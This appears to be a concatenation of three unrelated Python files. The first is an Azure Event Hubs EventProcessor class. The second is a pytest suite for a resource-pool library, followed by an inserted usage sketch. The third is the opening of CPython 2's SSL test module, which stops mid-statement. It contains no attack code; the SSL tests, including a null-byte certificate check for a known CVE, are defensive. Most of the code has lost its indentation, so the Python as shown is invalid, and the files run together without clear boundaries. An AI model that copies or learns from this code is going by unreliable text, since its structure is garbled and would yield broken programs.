# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import uuid
import logging
import time
import threading
from typing import Dict, Callable, List, Any, Union, TYPE_CHECKING, Optional, Iterable, cast
from functools import partial
from .partition_context import PartitionContext
from .ownership_manager import OwnershipManager
from .common import CloseReason
from ._eventprocessor_mixin import EventProcessorMixin
if TYPE_CHECKING:
from datetime import datetime
from .checkpoint_store import CheckpointStore
from .._common import EventData
from .._consumer import EventHubConsumer
from .._consumer_client import EventHubConsumerClient
_LOGGER = logging.getLogger(__name__)
class EventProcessor(EventProcessorMixin): # pylint:disable=too-many-instance-attributes
"""
An EventProcessor constantly receives events from one or multiple partitions of the Event Hub
in the context of a given consumer group.
"""
def __init__(
self,
eventhub_client, # type: EventHubConsumerClient
consumer_group, # type: str
on_event, # type: Callable[[PartitionContext, EventData], None]
**kwargs # type: Any
):
# type: (...) -> None
# pylint: disable=line-too-long
self._consumer_group = consumer_group
self._eventhub_client = eventhub_client
self._namespace = eventhub_client._address.hostname # pylint: disable=protected-access
self._eventhub_name = eventhub_client.eventhub_name
self._event_handler = on_event
self._partition_id = kwargs.get("partition_id", None) # type: Optional[str]
self._error_handler = kwargs.get("on_error", None) # type: Optional[Callable[[PartitionContext, Exception], None]]
self._partition_initialize_handler = kwargs.get("on_partition_initialize", None) # type: Optional[Callable[[PartitionContext], None]]
self._partition_close_handler = kwargs.get("on_partition_close", None) # type: Optional[Callable[[PartitionContext, CloseReason], None]]
self._checkpoint_store = kwargs.get("checkpoint_store", None) # type: Optional[CheckpointStore]
self._initial_event_position = kwargs.get("initial_event_position", "-1") # type: Union[str, int, datetime, Dict[str, Any]]
self._initial_event_position_inclusive = kwargs.get("initial_event_position_inclusive", False) # type: Union[bool, Dict[str, bool]]
self._load_balancing_interval = kwargs.get("load_balancing_interval", 10.0) # type: float
self._ownership_timeout = self._load_balancing_interval * 2
self._partition_contexts = {} # type: Dict[str, PartitionContext]
# Receive parameters
self._owner_level = kwargs.get("owner_level", None) # type: Optional[int]
if self._checkpoint_store and self._owner_level is None:
self._owner_level = 0
self._prefetch = kwargs.get("prefetch", None) # type: Optional[int]
self._track_last_enqueued_event_properties = kwargs.get("track_last_enqueued_event_properties", False)
self._id = str(uuid.uuid4())
self._running = False
self._lock = threading.RLock()
self._consumers = {} # type: Dict[str, EventHubConsumer]
self._ownership_manager = OwnershipManager(
self._eventhub_client,
self._consumer_group,
self._id,
self._checkpoint_store,
self._ownership_timeout,
self._partition_id
)
def __repr__(self):
# type: () -> str
return 'EventProcessor: id {}'.format(self._id)
def _cancel_tasks_for_partitions(self, to_cancel_partitions):
# type: (Iterable[str]) -> None
with self._lock:
for partition_id in to_cancel_partitions:
if partition_id in self._consumers:
self._consumers[partition_id].stop = True
if to_cancel_partitions:
_LOGGER.info("EventProcesor %r has cancelled partitions %r", self._id, to_cancel_partitions)
def _create_tasks_for_claimed_ownership(self, claimed_partitions, checkpoints=None):
# type: (Iterable[str], Optional[Dict[str, Dict[str, Any]]]) -> None
with self._lock:
for partition_id in claimed_partitions:
if partition_id not in self._consumers:
if partition_id in self._partition_contexts:
partition_context = self._partition_contexts[partition_id]
else:
partition_context = PartitionContext(
self._namespace,
self._eventhub_name,
self._consumer_group,
partition_id,
self._checkpoint_store
)
self._partition_contexts[partition_id] = partition_context
checkpoint = checkpoints.get(partition_id) if checkpoints else None
                    initial_event_position, event_position_inclusive = self.get_init_event_position(
partition_id,
checkpoint
)
event_received_callback = partial(self._on_event_received, partition_context)
self._consumers[partition_id] = cast('EventHubConsumer', self.create_consumer(
partition_id,
initial_event_position,
                        event_position_inclusive,
event_received_callback
))
if self._partition_initialize_handler:
self._handle_callback(
self._partition_initialize_handler,
self._partition_contexts[partition_id]
)
def _handle_callback(self, callback, *args):
# type: (Callable[..., None], Any) -> None
try:
callback(*args)
except Exception as exp: # pylint:disable=broad-except
partition_context = args[0] # type: PartitionContext
if self._error_handler and callback != self._error_handler:
self._handle_callback(self._error_handler, partition_context, exp)
else:
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" has another error during running process_error(). The exception is %r.",
self._id,
self._eventhub_name,
partition_context.partition_id if partition_context else None,
self._consumer_group,
exp
)
def _on_event_received(self, partition_context, event):
# type: (PartitionContext, EventData) -> None
with self._context(event):
if self._track_last_enqueued_event_properties:
partition_context._last_received_event = event # pylint: disable=protected-access
self._handle_callback(self._event_handler, partition_context, event)
def _load_balancing(self):
# type: () -> None
"""Start the EventProcessor.
The EventProcessor will try to claim and balance partition ownership with other `EventProcessor`
and start receiving EventData from EventHub and processing events.
:return: None
"""
while self._running:
try:
claimed_partition_ids = self._ownership_manager.claim_ownership()
if claimed_partition_ids:
existing_pids = set(self._consumers.keys())
claimed_pids = set(claimed_partition_ids)
to_cancel_pids = existing_pids - claimed_pids
newly_claimed_pids = claimed_pids - existing_pids
if newly_claimed_pids:
checkpoints = self._ownership_manager.get_checkpoints() if self._checkpoint_store else None
self._create_tasks_for_claimed_ownership(newly_claimed_pids, checkpoints)
else:
_LOGGER.info("EventProcessor %r hasn't claimed an ownership. It keeps claiming.", self._id)
to_cancel_pids = set(self._consumers.keys())
if to_cancel_pids:
self._cancel_tasks_for_partitions(to_cancel_pids)
except Exception as err: # pylint:disable=broad-except
_LOGGER.warning("An exception (%r) occurred during balancing and claiming ownership for "
"eventhub %r consumer group %r. Retrying after %r seconds",
err, self._eventhub_name, self._consumer_group, self._load_balancing_interval)
self._handle_callback(self._error_handler, None, err) # type: ignore
# ownership_manager.get_checkpoints() and ownership_manager.claim_ownership() may raise exceptions
# when there are load balancing and/or checkpointing (checkpoint_store isn't None).
# They're swallowed here to retry every self._load_balancing_interval seconds.
# Meanwhile this event processor won't lose the partitions it has claimed before.
# If it keeps failing, other EventProcessors will start to claim ownership of the partitions
# that this EventProcessor is working on. So two or multiple EventProcessors may be working
# on the same partition for a short while.
# Setting owner_level would create exclusive connection to the partition and
# alleviate duplicate-receiving greatly.
time.sleep(self._load_balancing_interval)
def _close_consumer(self, partition_id, consumer, reason):
# type: (str, EventHubConsumer, CloseReason) -> None
consumer.close()
with self._lock:
del self._consumers[partition_id]
_LOGGER.info(
"PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" is being closed. Reason is: %r",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
reason
)
if self._partition_close_handler:
self._handle_callback(self._partition_close_handler, self._partition_contexts[partition_id], reason)
self._ownership_manager.release_ownership(partition_id)
def start(self):
# type: () -> None
if self._running:
_LOGGER.info("EventProcessor %r has already started.", self._id)
return
_LOGGER.info("EventProcessor %r is being started", self._id)
self._running = True
thread = threading.Thread(target=self._load_balancing)
thread.daemon = True
thread.start()
while self._running:
for partition_id, consumer in list(self._consumers.items()):
if consumer.stop:
self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST)
continue
try:
consumer.receive()
except Exception as error: # pylint:disable=broad-except
_LOGGER.warning(
"PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" has met an error. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
error
)
if self._error_handler:
self._handle_callback(self._error_handler, self._partition_contexts[partition_id], error)
self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST)
with self._lock:
for partition_id, consumer in list(self._consumers.items()):
self._close_consumer(partition_id, consumer, CloseReason.SHUTDOWN)
def stop(self):
# type: () -> None
"""Stop the EventProcessor.
The EventProcessor will stop receiving events from EventHubs and release the ownership of the partitions
it is working on.
Other running EventProcessor will take over these released partitions.
A stopped EventProcessor can be restarted by calling method `start` again.
:return: None
"""
if not self._running:
_LOGGER.info("EventProcessor %r has already been stopped.", self._id)
return
self._running = False
_LOGGER.info("EventProcessor %r has been stopped.", self._id)
|
test_pool_test.py
|
#!/usr/bin/env python3
import pytest
from threading import Thread
import time
from contextlib import ExitStack
import pyresourcepool.pyresourcepool as rp
class Person(object):
def __init__(self, name):
self.name = name
def do_callback_upper(obj):
time.sleep(1)
obj.name = obj.name.upper()
def do_callback_lower(obj):
time.sleep(1)
obj.name = obj.name.lower()
def do_callback_exception(obj):
raise ValueError("some random error")
# the next line should never be run
obj.name = obj.name.upper()
@pytest.fixture
def pool():
return rp.ResourcePool([Person("John"),
Person("Jim"),
Person("Jake"),
Person("Jason")])
@pytest.fixture
def pool_with_callback_ok():
return rp.ResourcePool([Person("John"),
Person("Jim"),
Person("Jake"),
Person("Jason")],
return_callback=do_callback_upper)
@pytest.fixture
def pool_with_callback_exception():
return rp.ResourcePool([Person("John"),
Person("Jim"),
Person("Jake"),
Person("Jason")],
return_callback=do_callback_exception)
def get_and_hold_resource(p, t):
""" wait/get resource and sleep for 't' seconds """
with p.get_resource():
time.sleep(t)
def test_pool_use(pool):
assert len(pool._available) == 4
assert (pool._available[0].name == "John")
with pool.get_resource() as x:
assert (x.name == "John")
assert len(pool._available) == 3
assert (pool._available[0].name == "Jim")
assert len(pool._available) == 4
assert pool.active_size == 4
assert (pool._available[0].name == "Jim")
assert (pool._available[1].name == "Jake")
assert pool.active_size == 4
assert (pool._available[2].name == "Jason")
assert (pool._available[3].name == "John")
threads = [Thread(target=get_and_hold_resource, args=(pool, 0.4)),
Thread(target=get_and_hold_resource, args=(pool, 0.3)),
Thread(target=get_and_hold_resource, args=(pool, 0.2))]
for t in threads:
t.start()
time.sleep(0.05)
assert len(pool._available) == 1
assert pool.active_size == 4
assert (pool._available[0].name == "John")
assert (pool._available[-1].name == "John")
assert pool.active_size == 4
time.sleep(0.5)
assert len(pool._available) == 4
assert (pool._available[0].name == "John")
assert (pool._available[1].name == "Jason")
assert (pool._available[2].name == "Jake")
assert (pool._available[3].name == "Jim")
assert pool.active_size == 4
    # Jim will initially be released first, then be held the longest the
    # second time around, so it will appear last.
    # Jake will initially be released second, then be held the second
    # longest, so it ends up second to last.
threads = [Thread(target=get_and_hold_resource, args=(pool, 0.6)),
Thread(target=get_and_hold_resource, args=(pool, 0.5)),
Thread(target=get_and_hold_resource, args=(pool, 0.4)),
Thread(target=get_and_hold_resource, args=(pool, 0.3)),
Thread(target=get_and_hold_resource, args=(pool, 0.7)),
Thread(target=get_and_hold_resource, args=(pool, 0.5))]
for t in threads:
t.start()
time.sleep(4.0)
assert len(pool._available) == 4
assert pool.active_size == 4
assert (pool._available[0].name == "Jason")
assert (pool._available[1].name == "John")
assert (pool._available[2].name == "Jake")
assert (pool._available[3].name == "Jim")
assert pool.active_size == 4
def test_pool_object_removal(pool):
# remove all but one from the pool
assert pool.active_size == 4
for i in range(3):
with pool.get_resource() as x:
pool.remove(x)
assert len(pool._available) == 3 - i
assert pool.active_size == 3 - i
assert len(pool._available) == 3 - i
assert pool.active_size == 1
# remove the last item from the pool and expect an exception
with pytest.raises(rp.AllResourcesRemoved):
with pool.get_resource() as x:
pool.remove(x)
# we should not get to this bad assertion because an exception
# should be raised
assert False
# try to get an object from the pool and expect an exception
with pytest.raises(rp.AllResourcesRemoved):
with pool.get_resource() as x:
# we should not get to this bad assertion because an exception
# should be raised
assert False
def test_pool_object_removal_non_member(pool):
# create a new object
obj = Person("Jeff")
with pytest.raises(rp.ObjectNotInPool):
pool.remove(obj)
# we should not get to this bad assertion because an exception
# should be raised
assert False
def test_pool_non_block(pool):
with ExitStack() as stack:
obj1 = stack.enter_context(pool.get_resource(block=False))
assert obj1.name == "John"
obj2 = stack.enter_context(pool.get_resource(block=False))
assert obj2.name == "Jim"
obj3 = stack.enter_context(pool.get_resource(block=False))
assert obj3.name == "Jake"
obj4 = stack.enter_context(pool.get_resource(block=False))
assert obj4.name == "Jason"
# pool should be depleted by this point
obj5 = stack.enter_context(pool.get_resource(block=False))
assert obj5 is None
obj6 = stack.enter_context(pool.get_resource(block=False))
assert obj6 is None
assert len(pool._available) == 4
def test_pool_add(pool):
with pool.get_resource() as obj1:
assert obj1.name == "John"
newPerson = Person("Jenny")
pool.add(newPerson)
assert len(pool._available) == 5
with ExitStack() as stack:
obj1 = stack.enter_context(pool.get_resource(block=False))
assert obj1.name == "Jim"
obj2 = stack.enter_context(pool.get_resource(block=False))
assert obj2.name == "Jake"
obj3 = stack.enter_context(pool.get_resource(block=False))
assert obj3.name == "Jason"
obj4 = stack.enter_context(pool.get_resource(block=False))
assert obj4.name == "John"
obj5 = stack.enter_context(pool.get_resource(block=False))
assert obj5.name == "Jenny"
# pool should be depleted by this point
with pytest.raises(rp.ObjectAlreadyInPool):
pool.add(obj2)
            # shouldn't make it to the bad assert below
assert False
obj6 = stack.enter_context(pool.get_resource(block=False))
assert obj6 is None
assert len(pool._available) == 0
assert len(pool._available) == 5
with pytest.raises(rp.ObjectAlreadyInPool):
pool.add(newPerson)
        # shouldn't make it to the 'assert False' below
assert False
assert len(pool._available) == 5
def test_pool_add_list(pool):
newPeople = [Person("Jenny"), Person("Jasmin"), Person("June")]
pool.add(newPeople)
assert len(pool._available) == 7
assert pool.active_size == 7
with ExitStack() as stack:
obj1 = stack.enter_context(pool.get_resource(block=False))
assert obj1.name == "John"
obj2 = stack.enter_context(pool.get_resource(block=False))
assert obj2.name == "Jim"
obj3 = stack.enter_context(pool.get_resource(block=False))
assert obj3.name == "Jake"
obj4 = stack.enter_context(pool.get_resource(block=False))
assert obj4.name == "Jason"
obj5 = stack.enter_context(pool.get_resource(block=False))
assert obj5.name == "Jenny"
obj6 = stack.enter_context(pool.get_resource(block=False))
assert obj6.name == "Jasmin"
obj7 = stack.enter_context(pool.get_resource(block=False))
assert obj7.name == "June"
assert pool.active_size == 7
# pool should be depleted by this point
with pytest.raises(rp.ObjectAlreadyInPool):
pool.add(obj2)
            # shouldn't make it to the bad assert below
assert False
obj8 = stack.enter_context(pool.get_resource(block=False))
assert obj8 is None
assert len(pool._available) == 0
assert len(pool._available) == 7
def test_pool_return_with_callback_ok(pool_with_callback_ok):
assert pool_with_callback_ok._return_callback == do_callback_upper
with pool_with_callback_ok.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
with pool_with_callback_ok.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
    # Due to the sleep in the callback, the objects should not yet have been
    # returned to the pool, nor have had the callback operation applied yet
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
    # after this sleep the callbacks should have completed
time.sleep(2)
assert obj1.name == "JOHN"
assert obj1 in pool_with_callback_ok._available
assert obj2.name == "JIM"
assert obj2 in pool_with_callback_ok._available
def test_pool_return_with_callback_exception(pool_with_callback_exception):
assert pool_with_callback_exception._return_callback == do_callback_exception
with pool_with_callback_exception.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool_with_callback_exception._available
with pool_with_callback_exception.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_exception._available
time.sleep(1)
assert obj1.name == "John"
assert obj1 not in pool_with_callback_exception._available
assert pool_with_callback_exception._removed[id(obj1)]
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_exception._available
assert pool_with_callback_exception._removed[id(obj2)]
def test_pool_return_with_obj_callback_ok(pool_with_callback_ok):
assert pool_with_callback_ok._return_callback == do_callback_upper
with pool_with_callback_ok.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
# override the callback just for obj1
obj1.resource_pool_return_callback = do_callback_lower
with pool_with_callback_ok.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
    # Due to the sleep in the callback, the objects should not yet have been
    # returned to the pool, nor have had the callback operation applied yet
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
    # after this sleep the callbacks should have completed
time.sleep(2)
assert obj1.name == "john"
assert obj1 in pool_with_callback_ok._available
assert obj2.name == "JIM"
assert obj2 in pool_with_callback_ok._available
def test_pool_return_with_object_specific_callback(pool):
assert pool._return_callback is None
with pool.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool._available
obj1.resource_pool_return_callback = do_callback_lower
with pool.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool._available
    # Due to the sleep in the callback, the objects should not yet have been
    # returned to the pool, nor have had the callback operation applied yet
assert obj1.name == "John"
assert obj1 not in pool._available
    # after this sleep the callbacks should have completed
time.sleep(2)
assert obj1.name == "john"
assert obj1 in pool._available
assert obj2.name == "Jim"
assert obj2 in pool._available
def test_return_object_not_in_pool(pool, pool_with_callback_ok):
obj1 = Person("Kevin")
with pytest.raises(rp.ObjectNotInPool):
pool.return_resource(obj1)
# we should not make it to this bad assertion
assert False
with pytest.raises(rp.ObjectNotInPool):
pool_with_callback_ok.return_resource(obj1)
# we should not make it to this bad assertion
assert False
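Outside of pytest, the behaviour exercised by these tests reduces to a small usage pattern; a sketch based only on the calls the tests themselves make (the Person class and names are illustrative):

import pyresourcepool.pyresourcepool as rp

class Person(object):
    def __init__(self, name):
        self.name = name

pool = rp.ResourcePool([Person("John"), Person("Jim")])

# blocking acquire: the object is checked out until the with-block exits
with pool.get_resource() as person:
    print("working with", person.name)

# non-blocking acquire: yields None when no resource is free
with pool.get_resource(block=False) as person:
    if person is None:
        print("no resource available right now")
    else:
        print("got", person.name)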
|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
from test.script_helper import assert_python_ok
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import shutil
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Jan 17 19:09:06 2028 GMT'))
self.assertEqual(p['notBefore'], asn1time('Jan 19 19:09:06 2018 GMT'))
self.assertEqual(p['serialNumber'], 'F9BA076D5B6ABD9B')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
